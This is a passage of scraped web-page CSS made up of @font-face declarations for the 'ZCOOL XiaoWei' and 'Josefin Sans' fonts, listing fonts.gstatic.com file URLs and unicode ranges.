U+76d7, U+7763, U+78e8, U+795d, U+79df, U+7c4d, U+7d2f, U+7ee9, U+7f13, U+7f8a, U+8000, U+8010, U+80af, U+80f6, U+80f8, U+8212, U+8273, U+82f9, U+83ab, U+83b1, U+83f2, U+8584, U+871c, U+8861, U+888b, U+88c1, U+88e4, U+8bd1, U+8bf1, U+8c31, U+8d5a, U+8d75-8d76, U+8de8, U+8f85, U+8fa3, U+8fc5, U+9006, U+903c, U+904d, U+9075, U+9178, U+9274, U+950b, U+9526, U+95ea, U+9636, U+9686, U+978b, U+987f, U+9a7e, U+9b42, U+9e1f, U+9ea6, U+9f13, U+9f84, U+ff5e;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.112.woff2) format(\'woff2\');unicode-range: U+23, U+3d, U+4e01, U+4e39, U+4e73, U+4ecd, U+4ed9, U+4eea, U+4f0a, U+4f1f, U+4f5b, U+4fa0, U+4fc3, U+501f, U+50a8, U+515a, U+5175, U+51a0, U+51c0, U+51e1, U+51e4, U+5200, U+520a, U+5224, U+523a, U+52aa, U+52b1, U+52b3, U+5348, U+5353, U+5360, U+5371, U+5377, U+539a, U+541b, U+5434, U+547c, U+54e6, U+5510, U+5531, U+5609, U+56f0, U+56fa, U+5733, U+574f, U+5851, U+5854, U+5899, U+58c1, U+592e, U+5939, U+5976, U+5986, U+59bb, U+5a18, U+5a74, U+5b59, U+5b87, U+5b97, U+5ba0, U+5bab, U+5bbd-5bbe, U+5bf8, U+5c0a, U+5c3a, U+5c4a, U+5e16, U+5e1d, U+5e2d, U+5e8a, U+6015, U+602a, U+6050, U+6069, U+6162, U+61c2, U+6293, U+6297, U+62b1, U+62bd, U+62df, U+62fc, U+6302, U+635f, U+638c, U+63ed, U+6458, U+6469, U+6563, U+6620, U+6653, U+6696-6697, U+66dd, U+675f, U+676f-6770, U+67d0, U+67d3, U+684c, U+6865, U+6885, U+68b0, U+68ee, U+690d, U+6b23, U+6b32, U+6bd5, U+6c89, U+6d01, U+6d25, U+6d89, U+6da6, U+6db2, U+6df7, U+6ed1, U+6f02, U+70c8, U+70df, U+70e7, U+7126, U+7236, U+7259, U+731c, U+745e, U+74e3, U+751a, U+751c, U+7532, U+7545, U+75db, U+7761, U+7a0d, U+7b51, U+7ca4, U+7cd6, U+7d2b, U+7ea0, U+7eb9, U+7ed8, U+7f18, U+7f29, U+8033, U+804a, U+80a4-80a5, U+80e1, U+817f, U+829d, U+82e6, U+8336, U+840c, U+8499, U+864e, U+8651, U+865a, U+88ad, U+89e6, U+8bd7, U+8bfa, U+8c37, U+8d25, U+8d38, U+8ddd, U+8fea, U+9010, U+9012, U+906d, U+907f-9080, U+90d1, U+9177, U+91ca, U+94fa, U+9501, U+9634-9635, U+9694, U+9707, U+9738, U+9769, U+9a7b, U+9a97, U+9aa8, U+9b3c, U+9c81, U+9ed8;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.113.woff2) format(\'woff2\');unicode-range: U+26, U+3c, U+d7, U+4e4e, U+4e61, U+4e71, U+4ebf, U+4f26, U+5012, U+51ac, U+51b0, U+51b2, U+51b7, U+5218, U+521a, U+5220, U+5237, U+523b, U+526f, U+5385, U+53bf, U+53e5, U+53eb, U+53f3, U+53f6, U+5409, U+5438, U+54c8, U+54e5, U+552f, U+5584, U+5706, U+5723, U+5750, U+575a, U+5987-5988, U+59b9, U+59d0, U+59d4, U+5b88, U+5b9c, U+5bdf, U+5bfb, U+5c01, U+5c04, U+5c3e, U+5c4b, U+5c4f, U+5c9b, U+5cf0, U+5ddd, U+5de6, U+5de8, U+5e01, U+5e78, U+5e7b, U+5e9c, U+5ead, U+5ef6, U+5f39, U+5fd8, U+6000, U+6025, U+604b, U+6076, U+613f, U+6258, U+6263, U+6267, U+6298, U+62a2, U+62e5, U+62ec, U+6311, U+6377, U+6388-6389, U+63a2, U+63d2, U+641e, U+642d, U+654f, U+6551, U+6597, U+65cf, U+65d7, U+65e7, U+6682, U+66f2, U+671d, U+672b, U+6740, U+6751, U+6768, U+6811, U+6863, U+6982, U+6bd2, U+6cf0, U+6d0b, U+6d17, U+6d59, U+6dd8, U+6dfb, U+6e7e, U+6f6e, U+6fb3, U+706f, U+719f, U+72af, U+72d0, U+72d7, U+732b, U+732e, U+7389, U+73e0, U+7530, U+7687, U+76d6, U+76db, U+7840, U+786c, U+79cb, U+79d2, U+7a0e, U+7a33, U+7a3f, U+7a97, U+7ade-7adf, U+7b26, U+7e41, U+7ec3, U+7f3a, U+8089, U+80dc, U+811a, U+8131, U+8138, U+821e, U+8349, U+83dc, U+8457, U+867d, U+86cb, U+8a89, U+8ba8, U+8bad, U+8bef, U+8bfe, U+8c6a, U+8d1d, U+8d4f, U+8d62, U+8dd1, U+8df3, U+8f6e, U+8ff9, U+900f, U+9014, U+9057, U+9192, U+91ce, U+9488, U+94a2, U+9547, U+955c, U+95f2, U+9644, U+964d, U+96c4-96c5, U+96e8, U+96f6-96f7, U+9732, U+9759, U+9760, U+987a, U+989c, U+9910, U+996d-996e, U+9b54, U+9e21, U+9ebb, U+9f50;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.114.woff2) format(\'woff2\');unicode-range: U+7e, U+2026, U+4e03, U+4e25, U+4e30, U+4e34, U+4e45, U+4e5d, U+4e89, U+4eae, U+4ed8, U+4f11, U+4f19, U+4f24, U+4f34, U+4f59, U+4f73, U+4f9d, U+4fb5, U+5047, U+505c, U+5170, U+519c, U+51cf, U+5267, U+5356, U+5374, U+5382, U+538b, U+53e6, U+5426, U+542b, U+542f, U+5462, U+5473, U+554a, U+5566, U+5708, U+571f, U+5757, U+57df, U+57f9, U+5802, U+590f, U+591c, U+591f, U+592b, U+5965, U+5979, U+5a01, U+5a5a, U+5b63, U+5b69, U+5b81, U+5ba1, U+5ba3, U+5c3c, U+5c42, U+5c81, U+5de7, U+5dee, U+5e0c, U+5e10, U+5e55, U+5e86, U+5e8f, U+5ea7, U+5f02, U+5f52, U+5f81, U+5ff5, U+60ca, U+60e0, U+6279, U+62c5, U+62ff, U+63cf, U+6444, U+64cd, U+653b, U+65bd, U+65e9, U+665a, U+66b4, U+66fe, U+6728, U+6742, U+677e, U+67b6, U+680f, U+68a6, U+68c0, U+699c, U+6b4c, U+6b66, U+6b7b, U+6bcd, U+6bdb, U+6c38, U+6c47, U+6c49, U+6cb3, U+6cb9, U+6ce2, U+6d32, U+6d3e, U+6d4f, U+6e56, U+6fc0, U+7075, U+7206, U+725b, U+72c2, U+73ed, U+7565, U+7591, U+7597, U+75c5, U+76ae, U+76d1, U+76df, U+7834, U+7968, U+7981, U+79c0, U+7a7f, U+7a81, U+7ae5, U+7b14, U+7c89, U+7d27, U+7eaf, U+7eb3, U+7eb8, U+7ec7, U+7ee7, U+7eff, U+7f57, U+7ffb, U+805a, U+80a1, U+822c, U+82cf, U+82e5, U+8363, U+836f, U+84dd, U+878d, U+8840, U+8857, U+8863, U+8865, U+8b66, U+8bb2, U+8bda, U+8c01, U+8c08, U+8c46, U+8d1f, U+8d35, U+8d5b, U+8d5e, U+8da3, U+8ddf, U+8f93, U+8fdd, U+8ff0, U+8ff7, U+8ffd, U+9000, U+9047, U+9152, U+949f, U+94c1, U+94f6, U+9646, U+9648, U+9669, U+969c, U+96ea, U+97e9, U+987b, U+987e, U+989d, U+9970, U+9986, U+9c7c, U+9c9c;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.115.woff2) format(\'woff2\');unicode-range: U+25, U+4e14, U+4e1d, U+4e3d, U+4e49, U+4e60, U+4e9a, U+4eb2, U+4ec5, U+4efd, U+4f3c, U+4f4f, U+4f8b, U+4fbf, U+5019, U+5145, U+514b, U+516b, U+516d, U+5174, U+5178, U+517b, U+5199, U+519b, U+51b3, U+51b5, U+5207, U+5212, U+5219, U+521d, U+52bf, U+533b, U+5343, U+5347, U+534a, U+536b, U+5370, U+53e4, U+53f2, U+5403, U+542c, U+547d, U+54a8, U+54cd, U+54ea, U+552e, U+56f4, U+5747, U+575b, U+5883, U+589e, U+5931, U+5947, U+5956-5957, U+5a92, U+5b83, U+5ba4, U+5bb3, U+5bcc, U+5c14, U+5c1a, U+5c3d, U+5c40, U+5c45, U+5c5e, U+5df4, U+5e72, U+5e95, U+5f80, U+5f85, U+5fb7, U+5fd7, U+601d, U+626b, U+627f, U+62c9, U+62cd, U+6309, U+63a7, U+6545, U+65ad, U+65af, U+65c5, U+666e, U+667a, U+670b, U+671b, U+674e, U+677f, U+6781, U+6790, U+6797, U+6821, U+6838-6839, U+697c, U+6b27, U+6b62, U+6bb5, U+6c7d, U+6c99, U+6d4b, U+6d4e, U+6d6a, U+6e29, U+6e2f, U+6ee1, U+6f14, U+6f2b, U+72b6, U+72ec, U+7387, U+7533, U+753b, U+76ca, U+76d8, U+7701, U+773c, U+77ed, U+77f3, U+7814, U+793c, U+79bb, U+79c1, U+79d8, U+79ef, U+79fb, U+7a76, U+7b11, U+7b54, U+7b56, U+7b97, U+7bc7, U+7c73, U+7d20, U+7eaa, U+7ec8, U+7edd, U+7eed, U+7efc, U+7fa4, U+804c, U+8058, U+80cc, U+8111, U+817e, U+826f, U+8303, U+843d, U+89c9, U+89d2, U+8ba2, U+8bbf, U+8bc9, U+8bcd, U+8be6, U+8c22, U+8c61, U+8d22, U+8d26-8d27, U+8d8a, U+8f6f, U+8f7b, U+8f83, U+8f91, U+8fb9, U+8fd4, U+8fdc, U+9002, U+94b1, U+9519, U+95ed, U+961f, U+9632-9633, U+963f, U+968f-9690, U+96be, U+9876, U+9884, U+98de, U+9988, U+9999, U+9ec4, U+ff1b;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.116.woff2) format(\'woff2\');unicode-range: U+2b, U+40, U+3000, U+300a-300b, U+4e16, U+4e66, U+4e70, U+4e91-4e92, U+4e94, U+4e9b, U+4ec0, U+4eca, U+4f01, U+4f17-4f18, U+4f46, U+4f4e, U+4f9b, U+4fee, U+503c, U+5065, U+50cf, U+513f, U+5148, U+518d, U+51c6, U+51e0, U+5217, U+529e-529f, U+5341, U+534f, U+5361, U+5386, U+53c2, U+53c8, U+53cc, U+53d7-53d8, U+53ea, U+5404, U+5411, U+5417, U+5427, U+5468, U+559c, U+5668, U+56e0, U+56e2, U+56ed, U+5740, U+57fa, U+58eb, U+5904, U+592a, U+59cb, U+5a31, U+5b58, U+5b9d, U+5bc6, U+5c71, U+5dde, U+5df1, U+5e08, U+5e26, U+5e2e, U+5e93, U+5e97, U+5eb7, U+5f15, U+5f20, U+5f3a, U+5f62, U+5f69, U+5f88, U+5f8b, U+5fc5, U+600e, U+620f, U+6218, U+623f, U+627e, U+628a, U+62a4, U+62db, U+62e9, U+6307, U+6362, U+636e, U+64ad, U+6539, U+653f, U+6548, U+6574, U+6613, U+6625, U+663e, U+666f, U+672a, U+6750, U+6784, U+6a21, U+6b3e, U+6b65, U+6bcf, U+6c11, U+6c5f, U+6df1, U+706b, U+7167, U+724c, U+738b, U+73a9, U+73af, U+7403, U+7537, U+754c, U+7559, U+767d, U+7740, U+786e, U+795e, U+798f, U+79f0, U+7aef, U+7b7e, U+7bb1, U+7ea2, U+7ea6, U+7ec4, U+7ec6, U+7ecd, U+7edc, U+7ef4, U+8003, U+80b2, U+81f3-81f4, U+822a, U+827a, U+82f1, U+83b7, U+8425, U+89c2, U+89c8, U+8ba9, U+8bb8, U+8bc6, U+8bd5, U+8be2, U+8be5, U+8bed, U+8c03, U+8d23, U+8d2d, U+8d34, U+8d70, U+8db3, U+8fbe, U+8fce, U+8fd1, U+8fde, U+9001, U+901f-9020, U+90a3, U+914d, U+91c7, U+94fe, U+9500, U+952e, U+9605, U+9645, U+9662, U+9664, U+9700, U+9752, U+975e, U+97f3, U+9879, U+9886, U+98df, U+9a6c, U+9a8c, U+9ed1, U+9f99;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.117.woff2) format(\'woff2\');unicode-range: U+4e, U+201c-201d, U+3010-3011, U+4e07, U+4e1c, U+4e24, U+4e3e, U+4e48, U+4e50, U+4e5f, U+4e8b-4e8c, U+4ea4, U+4eab-4eac, U+4ecb, U+4ece, U+4ed6, U+4ee3, U+4ef6-4ef7, U+4efb, U+4f20, U+4f55, U+4f7f, U+4fdd, U+505a, U+5143, U+5149, U+514d, U+5171, U+5177, U+518c, U+51fb, U+521b, U+5229, U+522b, U+52a9, U+5305, U+5317, U+534e, U+5355, U+5357, U+535a, U+5373, U+539f, U+53bb, U+53ca, U+53cd, U+53d6, U+53e3, U+53f0, U+5458, U+5546, U+56db, U+573a, U+578b, U+57ce, U+58f0, U+590d, U+5934, U+5973, U+5b57, U+5b8c, U+5b98, U+5bb9, U+5bfc, U+5c06, U+5c11, U+5c31, U+5c55, U+5df2, U+5e03, U+5e38, U+5e76, U+5e94, U+5efa, U+5f71, U+5f97, U+5feb, U+6001, U+603b, U+60f3, U+611f, U+6216, U+624d, U+6253, U+6295, U+6301, U+6392, U+641c, U+652f, U+653e, U+6559, U+6599, U+661f, U+671f, U+672f, U+6761, U+67e5, U+6807, U+6837, U+683c, U+6848, U+6b22, U+6b64, U+6bd4, U+6c14, U+6c34, U+6c42, U+6ca1, U+6d41, U+6d77, U+6d88, U+6e05, U+6e38, U+6e90, U+7136, U+7231, U+7531, U+767e, U+76ee, U+76f4, U+771f, U+7801, U+793a, U+79cd, U+7a0b, U+7a7a, U+7acb, U+7ae0, U+7b2c, U+7b80, U+7ba1, U+7cbe, U+7d22, U+7ea7, U+7ed3, U+7ed9, U+7edf, U+7f16, U+7f6e, U+8001, U+800c, U+8272, U+8282, U+82b1, U+8350, U+88ab, U+88c5, U+897f, U+89c1, U+89c4, U+89e3, U+8a00, U+8ba1, U+8ba4, U+8bae-8bb0, U+8bbe, U+8bc1, U+8bc4, U+8bfb, U+8d28, U+8d39, U+8d77, U+8d85, U+8def, U+8eab, U+8f66, U+8f6c, U+8f7d, U+8fd0, U+9009, U+90ae, U+90fd, U+91cc-91cd, U+91cf, U+95fb, U+9650, U+96c6, U+9891, U+98ce, U+ff1f;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.118.woff2) format(\'woff2\');unicode-range: U+d, U+3e, U+5f, U+7c, U+a0, U+a9, U+4e09-4e0b, U+4e0d-4e0e, U+4e13, U+4e1a, U+4e2a, U+4e3a-4e3b, U+4e4b, U+4e86, U+4e8e, U+4ea7, U+4eba, U+4ee4-4ee5, U+4eec, U+4f1a, U+4f4d, U+4f53, U+4f5c, U+4f60, U+4fe1, U+5165, U+5168, U+516c, U+5173, U+5176, U+5185, U+51fa, U+5206, U+5230, U+5236, U+524d, U+529b, U+52a0-52a1, U+52a8, U+5316, U+533a, U+53cb, U+53d1, U+53ef, U+53f7-53f8, U+5408, U+540c-540e, U+544a, U+548c, U+54c1, U+56de, U+56fd-56fe, U+5728, U+5730, U+5907, U+5916, U+591a, U+5927, U+5929, U+597d, U+5982, U+5b50, U+5b66, U+5b89, U+5b9a, U+5b9e, U+5ba2, U+5bb6, U+5bf9, U+5c0f, U+5de5, U+5e02, U+5e73-5e74, U+5e7f, U+5ea6, U+5f00, U+5f0f, U+5f53, U+5f55, U+5fae, U+5fc3, U+6027, U+606f, U+60a8, U+60c5, U+610f, U+6210-6211, U+6237, U+6240, U+624b, U+6280, U+62a5, U+63a5, U+63a8, U+63d0, U+6536, U+6570, U+6587, U+65b9, U+65e0, U+65f6, U+660e, U+662d, U+662f, U+66f4, U+6700, U+670d, U+672c, U+673a, U+6743, U+6765, U+679c, U+682a, U+6b21, U+6b63, U+6cbb, U+6cd5, U+6ce8, U+6d3b, U+70ed, U+7247-7248, U+7269, U+7279, U+73b0, U+7406, U+751f, U+7528, U+7535, U+767b, U+76f8, U+770b, U+77e5, U+793e, U+79d1, U+7ad9, U+7b49, U+7c7b, U+7cfb, U+7ebf, U+7ecf, U+7f8e, U+8005, U+8054, U+80fd, U+81ea, U+85cf, U+884c, U+8868, U+8981, U+89c6, U+8bba, U+8bdd, U+8bf4, U+8bf7, U+8d44, U+8fc7, U+8fd8-8fd9, U+8fdb, U+901a, U+9053, U+90e8, U+91d1, U+957f, U+95e8, U+95ee, U+95f4, U+9762, U+9875, U+9898, U+9996, U+9ad8, U+ff01, U+ff08-ff09;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.119.woff2) format(\'woff2\');unicode-range: U+20-22, U+27-2a, U+2c-3b, U+3f, U+41-4d, U+4f-5d, U+61-7b, U+7d, U+ab, U+ae, U+b2, U+b7, U+bb, U+df-e5, U+e7-ea, U+ec-ed, U+f1-f4, U+f6, U+f9-fa, U+fc, U+101, U+103, U+113, U+12b, U+148, U+14d, U+16b, U+1ce, U+1d0, U+300-301, U+1ebf, U+1ec7, U+2013-2014, U+2022, U+2027, U+2039-203a, U+2122, U+3001-3002, U+3042, U+3044, U+3046, U+3048, U+304a-3055, U+3057, U+3059-305b, U+305d, U+305f-3061, U+3063-306b, U+306d-3073, U+3075-3076, U+3078-3079, U+307b, U+307e-307f, U+3081-308d, U+308f, U+3092-3093, U+30a1-30a4, U+30a6-30bb, U+30bd, U+30bf-30c1, U+30c3-30c4, U+30c6-30cb, U+30cd-30d7, U+30d9-30e1, U+30e3-30e7, U+30e9-30ed, U+30ef, U+30f3, U+30fb-30fc, U+3127, U+4e00, U+4e2d, U+65b0, U+65e5, U+6708-6709, U+70b9, U+7684, U+7f51, U+ff0c, U+ff0e, U+ff1a;}/* latin */@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1UFWaHi6WZ3Q.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 *//* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: 